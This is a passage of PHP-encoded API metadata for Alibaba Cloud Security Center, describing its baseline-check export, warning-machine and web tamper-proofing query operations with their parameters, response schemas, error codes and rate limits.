\\"[{\\\\n\\\\\\"name\\\\\\":\\\\\\"oval:com.redhat.rhsa:def:20173263\\\\\\",\\\\n\\\\\\"type\\\\\\":\\\\\\"cve\\\\\\",\\\\n\\\\\\"aliasName\\\\\\":\\\\\\"RHSA-2017:3263: curl security update\\\\\\"\\\\n}]\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeWarningExportInfo' => [ 'summary' => 'Queries the progress of a export task for a baseline check result.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'ExportId', 'in' => 'query', 'schema' => ['description' => 'The ID of the export task.'."\n" ."\n" .'> You can can call the [ExportWarning](~~ExportWarning~~) operation to query the IDs of export tasks.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '14356', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'Link' => ['description' => 'The URL at which you can download the exported Excel file.'."\n", 'type' => 'string', 'example' => 'https://eds.aliyun.com/notification/entitle/64b5c3e2-e52b-4d29-9617-e7e6d74XXXX', 'title' => ''], 'Progress' => ['description' => 'The progress percentage of the export task.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '79CFF74D-E967-5407-8A78-EE03B925FDAA', 'title' => ''], 'CurrentCount' => ['description' => 'The number of baseline entries that are exported.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Message' => ['description' => 'The message that shows the task result. The value is fixed as **successful**, which indicates that the export task is complete.'."\n", 'type' => 'string', 'example' => 'successful', 'title' => ''], 'FileName' => ['description' => 'The name of the exported Excel file.'."\n", 'type' => 'string', 'example' => 'app_20210917', 'title' => ''], 'TotalCount' => ['description' => 'The total number of baseline entries returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'ExportStatus' => ['description' => 'The status of the export task.'."\n" ."\n" .'Valid values:'."\n" ."\n" .'* **init**: The task is being initialized.'."\n" .'* **exporting**: The task is in progress.'."\n" .'* **success**: The task is successful.'."\n", 'type' => 'string', 'example' => 'success', 'title' => ''], 'Id' => ['description' => 'The ID of the export task for the baseline check result.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '131231', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Link\\": \\"https://eds.aliyun.com/notification/entitle/64b5c3e2-e52b-4d29-9617-e7e6d74XXXX\\",\\n \\"Progress\\": 100,\\n \\"RequestId\\": \\"79CFF74D-E967-5407-8A78-EE03B925FDAA\\",\\n \\"CurrentCount\\": 1,\\n \\"Message\\": \\"successful\\",\\n \\"FileName\\": \\"app_20210917\\",\\n \\"TotalCount\\": 100,\\n \\"ExportStatus\\": \\"success\\",\\n \\"Id\\": 131231\\n}","type":"json"}]', 'title' => 'DescribeWarningExportInfo', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeWarningExportInfo'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeWarningExportInfo', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeWarningMachines' => [ 'summary' => 'Queries information about servers on which a baseline check is performed. The information includes the IDs of the servers, the statistics of a risk item, and the status of the risk item.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas0XJWFD'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.'."\n", 'type' => 'string', 'required' => false, 'example' => '1.2.XX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'MachineName', 'in' => 'query', 'schema' => ['description' => 'The name of the server on which the baseline check is performed.'."\n", 'type' => 'string', 'required' => false, 'example' => 'oracle-win-001****', 'title' => ''], ], [ 'name' => 'Uuids', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server on which the baseline check is performed. Separate multiple UUIDs with commas (,).'."\n", 'type' => 'string', 'required' => false, 'example' => '9888955c-0076-49da-bd9c-34f5492b****', 'title' => ''], ], [ 'name' => 'RiskId', 'in' => 'query', 'schema' => ['description' => 'The ID of the risk item.'."\n" ."\n" .'> You can call the [DescribeCheckWarningSummary](~~DescribeCheckWarningSummary~~) operation to query the IDs of risk items.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '196', 'title' => ''], ], [ 'name' => 'StrategyId', 'in' => 'query', 'schema' => ['description' => 'The ID of the baseline check policy.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '16', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page. Default value: **10**, which indicates that 10 entries of server information are displayed on each page. A maximum of 100 entries can be returned per page.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '10', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The number of the page to return. Default value: **1**.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The ID of the container cluster.'."\n" ."\n" .'> You can call the [DescribeGroupedContainerInstances](~~DescribeGroupedContainerInstances~~) operation to query the IDs of container clusters.'."\n", 'type' => 'string', 'required' => false, 'example' => 'c7e3c5b420a7947c2933303144688****', 'title' => ''], ], [ 'name' => 'ContainerFieldName', 'in' => 'query', 'schema' => ['description' => 'The name of the field that is used to search for the container. Valid values:'."\n" ."\n" .'* **CONTAINER_ID**: the ID of the container'."\n" .'* **IMAGE**: the name of the image'."\n" .'* **NAMESPACE**: the namespace'."\n" .'* **NODE_NAME**: the name of the node'."\n" .'* **POD_IP**: the IP address of the pod'."\n" .'* **HOST_IP**: the IP address of the host'."\n" .'* **INSTANCE_ID**: the ID of the instance'."\n", 'type' => 'string', 'required' => false, 'example' => 'containerId', 'title' => ''], ], [ 'name' => 'ContainerFieldValue', 'in' => 'query', 'schema' => ['description' => 'The value of the field that is used to search for the container.'."\n", 'type' => 'string', 'required' => false, 'example' => 'c8bb3ef0f5ccf45508f0fd1ffc200****', 'title' => ''], ], [ 'name' => 'TargetType', 'in' => 'query', 'schema' => ['description' => 'The type of the query condition. Valid values:'."\n" ."\n" .'* **containerId**: the ID of the container'."\n" .'* **uuid**: the UUID of the asset'."\n", 'type' => 'string', 'required' => false, 'example' => 'uuid', 'title' => ''], ], [ 'name' => 'HaveRisk', 'in' => 'query', 'schema' => ['description' => 'Specifies whether risks were detected. Valid values:'."\n" ."\n" .'* **1**: yes'."\n" .'* **0**: no'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'GroupId', 'in' => 'query', 'schema' => ['description' => 'The ID of the asset group.'."\n" ."\n" .'> You can call the [DescribeAllGroups](~~130972~~) operation to query the IDs of asset groups.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '123', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the returned page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries returned per page. Default value: **10**.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '6E4CBE87-E887-5AF1-86D2-78EB4AA3E771', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'WarningMachines' => [ 'description' => 'The information about the servers.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The information about the servers on which alerts are generated.'."\n", 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The verification status of the risk item after the risk item is fixed. Valid values:'."\n" ."\n" .'* **1**: complete'."\n" .'* **2**: verifying'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the server.'."\n", 'type' => 'string', 'example' => '1.2.XX.XX', 'title' => ''], 'InstanceId' => ['description' => 'The server ID.'."\n", 'type' => 'string', 'example' => 'i-m5ee8b9nr3h30mhb****', 'title' => ''], 'HighWarningCount' => ['description' => 'The number of **high-risk** items on the server.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the server.'."\n", 'type' => 'string', 'example' => '1.2.XX.XX', 'title' => ''], 'RegionId' => ['description' => 'The ID of the region in which the server is deployed.'."\n", 'type' => 'string', 'example' => 'cn-qingdao', 'title' => ''], 'LowWarningCount' => ['description' => 'The number of **low-risk** items on the server.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'PortOpen' => ['description' => 'Indicates whether a port on the server is accessible over the Internet. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the server on which the baseline check is performed.'."\n", 'type' => 'string', 'example' => '9888955c-0076-49da-bd9c-34f5492b****', 'title' => ''], 'MediumWarningCount' => ['description' => 'The number of **medium-risk** items on the server.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'PassCount' => ['description' => 'The number of the check items that passed the baseline check on the server.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'InstanceName' => ['description' => 'The name of the server.'."\n", 'type' => 'string', 'example' => 'oracle-win-00****', 'title' => ''], 'Bind' => ['description' => 'Indicates whether Security Center is authorized to protect the asset. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'AuthVersion' => ['description' => 'The edition of Security Center that is authorized to protect the asset. Valid values:'."\n" ."\n" .'* **1**: Basic edition'."\n" .'* **6**: Anti-virus edition'."\n" .'* **5**: Advanced edition'."\n" .'* **3**: Enterprise edition'."\n" .'* **7**: Ultimate edition'."\n" .'* **10**: Value-added Plan edition'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '7', 'title' => ''], 'ContainerId' => ['description' => 'The container ID.'."\n", 'type' => 'string', 'example' => '48a6d9a92435a13ad573372c3f3c63b7e04d106458141df9f92155709d******', 'title' => ''], 'ContainerName' => ['description' => 'The name of the container.'."\n", 'type' => 'string', 'example' => 'redis', 'title' => ''], 'Online' => ['description' => 'Indicates whether the agent is online. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'AssetType' => ['description' => 'The type of cloud product assets.'."\n" .'> You can call [ListCloudAssetInstances](~~ListCloudAssetInstances~~) to query the types of cloud product assets.', 'type' => 'string', 'example' => '0', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'ConsoleError', 'errorMessage' => 'The error message is %s %s.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 10,\\n \\"RequestId\\": \\"6E4CBE87-E887-5AF1-86D2-78EB4AA3E771\\",\\n \\"TotalCount\\": 1,\\n \\"Count\\": 10,\\n \\"WarningMachines\\": [\\n {\\n \\"Status\\": 1,\\n \\"InternetIp\\": \\"1.2.XX.XX\\",\\n \\"InstanceId\\": \\"i-m5ee8b9nr3h30mhb****\\",\\n \\"HighWarningCount\\": 10,\\n \\"IntranetIp\\": \\"1.2.XX.XX\\",\\n \\"RegionId\\": \\"cn-qingdao\\",\\n \\"LowWarningCount\\": 3,\\n \\"PortOpen\\": true,\\n \\"Uuid\\": \\"9888955c-0076-49da-bd9c-34f5492b****\\",\\n \\"MediumWarningCount\\": 2,\\n \\"PassCount\\": 10,\\n \\"InstanceName\\": \\"oracle-win-00****\\",\\n \\"Bind\\": true,\\n \\"AuthVersion\\": 7,\\n \\"ContainerId\\": \\"48a6d9a92435a13ad573372c3f3c63b7e04d106458141df9f92155709d******\\",\\n \\"ContainerName\\": \\"redis\\",\\n \\"Online\\": true,\\n \\"AssetType\\": \\"0\\"\\n }\\n ]\\n}","errorExample":""},{"type":"xml","example":"\\n 1\\n 10\\n 6E4CBE87-E887-5AF1-86D2-78EB4AA3E771\\n 1\\n 10\\n \\n 1\\n 1.2.XX.XX\\n i-m5ee8b9nr3h30mhb****\\n 10\\n 1.2.XX.XX\\n cn-qingdao\\n 3\\n true\\n 9888955c-0076-49da-bd9c-34f5492b****\\n 2\\n 10\\n oracle-win-00****\\n \\n","errorExample":""}]', 'title' => 'DescribeWarningMachines', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '20', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeWarningMachines'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeWarningMachines', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeWebLockBindList' => [ 'summary' => 'Retrieves the list of servers that have web tamper-proofing protection enabled.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92253', 'abilityTreeNodes' => ['FEATUREsas4GT4R7'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '116.30.XX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the request and response. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'The fuzzy match field for the server. The value can be a server name or IP address.', 'type' => 'string', 'required' => false, 'example' => '192.168.XX.XX', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'The protection status of the servers that you want to query. Valid values:'."\n" .'- **on**: Protection is enabled.'."\n" .'- **off**: Protection is disabled.', 'type' => 'string', 'required' => false, 'example' => 'on', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page in a paging query. Minimum value: 1. Default value: 1.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page in a paging query. Default value: 20.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the asset that you want to query.'."\n" .'> Call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => '7151f27e-1d51-4e98-a540-8936a****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paging query. Minimum value: 1. Default value: 1.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request. The China value is a unique identifier generated by Alibaba Cloud for the request and can be used for troubleshooting.', 'type' => 'string', 'example' => 'D9354C1A-D709-4873-9AAE-41513327B247', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page in a paging query. Default value: 20.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of servers attached to web tamper-proofing.', 'type' => 'integer', 'format' => 'int32', 'example' => '11409', 'title' => ''], 'BindList' => [ 'description' => 'The collection of servers that have web tamper-proofing protection enabled.', 'type' => 'array', 'items' => [ 'description' => 'The information about a server that has web tamper-proofing protection enabled.', 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The protection status of the server. Valid values:'."\n" .'- **on**: Protection is enabled.'."\n" .'- **off**: Protection is disabled.', 'type' => 'string', 'example' => 'on', 'title' => ''], 'Percent' => ['description' => 'The startup progress of web tamper-proofing protection, in percentage. Value range: 0 to 100%.', 'type' => 'integer', 'format' => 'int32', 'example' => '99', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the server.', 'type' => 'string', 'example' => '54.169.XX.XX', 'title' => ''], 'ServiceDetail' => ['description' => 'The details of the web tamper-proofing service exception. Valid values:'."\n" .'- **client offline**: The client is offline.'."\n" .'- **timeout**: The connection timeout.', 'type' => 'string', 'example' => 'client offline', 'title' => ''], 'Os' => ['description' => 'The operating system type of the server.', 'type' => 'string', 'example' => 'Linux', 'title' => ''], 'ServiceStatus' => ['description' => 'The web tamper-proofing service status of the server. Valid values:'."\n" .'- **stop**: The tamper-proofing service is not started.'."\n" .'- **initializing**: The tamper-proofing service is starting.'."\n" .'- **exception**: The tamper-proofing service is abnormal.'."\n" .'- **running**: The tamper-proofing service is running.'."\n" .'- **closing**: The tamper-proofing service is undergoing shutdown.', 'type' => 'string', 'example' => 'stop', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the server.', 'type' => 'string', 'example' => '192.168.XX.XX', 'title' => ''], 'AuditCount' => ['description' => 'The number of alerts.', 'type' => 'string', 'example' => '2', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the server.', 'type' => 'string', 'example' => 'inet-12345****', 'title' => ''], 'ServiceCode' => ['description' => 'The error code for the web tamper-proofing service exception. Valid values:'."\n" .'- **2001**: The client is offline.'."\n" .'- **9999**: The connection timeout.', 'type' => 'string', 'example' => '2001', 'title' => ''], 'InstanceName' => ['description' => 'The name of the server.', 'type' => 'string', 'example' => 'testName', 'title' => ''], 'DirCount' => ['description' => 'The number of protected directories.', 'type' => 'string', 'example' => '5', 'title' => ''], 'BlockCount' => ['description' => 'The number of blocked events.', 'type' => 'string', 'example' => '10', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'InternalError', 'errorMessage' => 'The request processing has failed due to some unknown error.', 'description' => ''], ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query web tamper-proofing server list', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeWebLockBindList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeWebLockBindList', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'WebLockBind', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:weblockbind/{#Uuid}'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"CurrentPage\\": 1,\\n \\"RequestId\\": \\"D9354C1A-D709-4873-9AAE-41513327B247\\",\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 11409,\\n \\"BindList\\": [\\n {\\n \\"Status\\": \\"on\\",\\n \\"Percent\\": 99,\\n \\"InternetIp\\": \\"54.169.XX.XX\\",\\n \\"ServiceDetail\\": \\"client offline\\",\\n \\"Os\\": \\"Linux\\",\\n \\"ServiceStatus\\": \\"stop\\",\\n \\"IntranetIp\\": \\"192.168.XX.XX\\",\\n \\"AuditCount\\": \\"2\\",\\n \\"Uuid\\": \\"inet-12345****\\",\\n \\"ServiceCode\\": \\"2001\\",\\n \\"InstanceName\\": \\"testName\\",\\n \\"DirCount\\": \\"5\\",\\n \\"BlockCount\\": \\"10\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeWebLockConfigList' => [ 'summary' => 'Queries the configurations of web tamper proofing for a specified server.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92254', 'abilityTreeNodes' => ['FEATUREsas4GT4R7'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.'."\n", 'type' => 'string', 'required' => false, 'example' => '123.24.XX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server.'."\n" ."\n" .'> You can call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to query the UUID.'."\n", 'type' => 'string', 'required' => true, 'example' => 'inet-1234567****', 'title' => ''], ], [ 'name' => 'Id', 'in' => 'query', 'schema' => ['description' => 'The configuration ID of the protected directory.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1404656', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'TotalCount' => ['description' => 'The total number of directories that have web tamper proofing enabled on the server.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request.'."\n", 'type' => 'string', 'example' => 'D9354C1A-D709-4873-9AAE-41513327B247', 'title' => ''], 'ConfigList' => [ 'description' => 'The configurations of web tamper proofing.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The configuration of web tamper proofing.'."\n", 'type' => 'object', 'properties' => [ 'ExclusiveDir' => ['description' => 'The directory that has web tamper proofing disabled.'."\n" ."\n" .'> If the value of **Mode** is **blacklist**, this parameter is returned.'."\n", 'type' => 'string', 'example' => '/home/admin/tomcat', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the server that has web tamper proofing enabled.'."\n", 'type' => 'string', 'example' => '80d2f7d6-31a9-4d7f-8ff4-7ecc42f8****', 'title' => ''], 'InclusiveFileType' => ['description' => 'The type of the file that has web tamper proofing enabled.'."\n" ."\n" .'> If the value of **Mode** is **whitelist**, this parameter is returned.'."\n", 'type' => 'string', 'example' => 'jpg', 'title' => ''], 'DefenceMode' => ['description' => 'The prevention mode. Valid values:'."\n" ."\n" .'* **block**: Interception Mode'."\n" .'* **audit**: Alert Mode'."\n", 'type' => 'string', 'example' => 'audit', 'title' => ''], 'ExclusiveFileType' => ['description' => 'The type of the file that has web tamper proofing disabled.'."\n" ."\n" .'> If the value of **Mode** is **blacklist**, this parameter is returned.'."\n", 'type' => 'string', 'example' => '*.jpg', 'title' => ''], 'InclusiveFile' => ['description' => 'The file that has web tamper proofing enabled.'."\n" ."\n" .'> If the value of **Mode** is **whitelist**, this parameter is returned.'."\n", 'type' => 'string', 'example' => '/home/admin/tomcat/aaa.log', 'title' => ''], 'Mode' => ['description' => 'The protection mode of web tamper proofing. Valid values:'."\n" ."\n" .'* **whitelist**: In this mode, web tamper proofing is enabled for the specified directories and file types.'."\n" .'* **blacklist**: In this mode, web tamper proofing is enabled for the unspecified subdirectories, file types, and files in the protected directory.'."\n", 'type' => 'string', 'example' => 'blacklist', 'title' => ''], 'Dir' => ['description' => 'The directory that has web tamper proofing enabled.'."\n", 'type' => 'string', 'example' => '/www/tmp/', 'title' => ''], 'ExclusiveFile' => ['description' => 'The file that has web tamper proofing disabled.'."\n" ."\n" .'> If the value of **Mode** is **blacklist**, this parameter is returned.'."\n", 'type' => 'string', 'example' => '/home/admin/tomcat/localhost.log', 'title' => ''], 'Id' => ['description' => 'The configuration ID of the protected directory.'."\n", 'type' => 'string', 'example' => '11', 'title' => ''], 'LocalBackupDir' => ['description' => 'The local path to the backup files of the protected directory.'."\n", 'type' => 'string', 'example' => '/usr/local/backup', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'InternalError', 'errorMessage' => 'The request processing has failed due to some unknown error.', 'description' => ''], ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"TotalCount\\": 1,\\n \\"RequestId\\": \\"D9354C1A-D709-4873-9AAE-41513327B247\\",\\n \\"ConfigList\\": [\\n {\\n \\"ExclusiveDir\\": \\"/home/admin/tomcat\\",\\n \\"Uuid\\": \\"80d2f7d6-31a9-4d7f-8ff4-7ecc42f8****\\",\\n \\"InclusiveFileType\\": \\"jpg\\",\\n \\"DefenceMode\\": \\"audit\\",\\n \\"ExclusiveFileType\\": \\"*.jpg\\",\\n \\"InclusiveFile\\": \\"/home/admin/tomcat/aaa.log\\",\\n \\"Mode\\": \\"blacklist\\",\\n \\"Dir\\": \\"/www/tmp/\\",\\n \\"ExclusiveFile\\": \\"/home/admin/tomcat/localhost.log\\",\\n \\"Id\\": \\"11\\",\\n \\"LocalBackupDir\\": \\"/usr/local/backup\\"\\n }\\n ]\\n}","errorExample":""},{"type":"xml","example":"\\n 1\\n EB7BD248-FBD6-4378-B244-0C9FB299BCBC\\n \\n php;jsp;asp;aspx;js;cgi;html;htm;xml;shtml;shtm;jpg;gif;png\\n \\n 80d2f7d6-31a9-4d7f-8ff4-7ecc42f8****\\n \\n whitelist\\n /usr/local/aegis/bak\\n \\n 9312\\n /www/tmp/\\n \\n \\n","errorExample":""}]', 'title' => 'DescribeWebLockConfigList', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeWebLockConfigList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeWebLockConfigList', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'WebLockConfig', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:weblockconfig/{#Uuid}'], ], ], ], ], ], 'DescribeWebLockExclusiveFileType' => [ 'summary' => 'Queries the types of files that are excluded from web tamper proofing.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'TotalCount' => ['description' => 'The total number of types of the files that are excluded from web tamper proofing.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '30', 'title' => ''], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '9CCD7D51-5E81-5FF5-BD74-813DDD248430', 'title' => ''], 'ExclusiveFileType' => [ 'description' => 'An array that consists of the types of the files that are excluded from web tamper proofing.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The type of the file that is excluded from web tamper proofing.'."\n" ."\n" .'* **log**: LOG 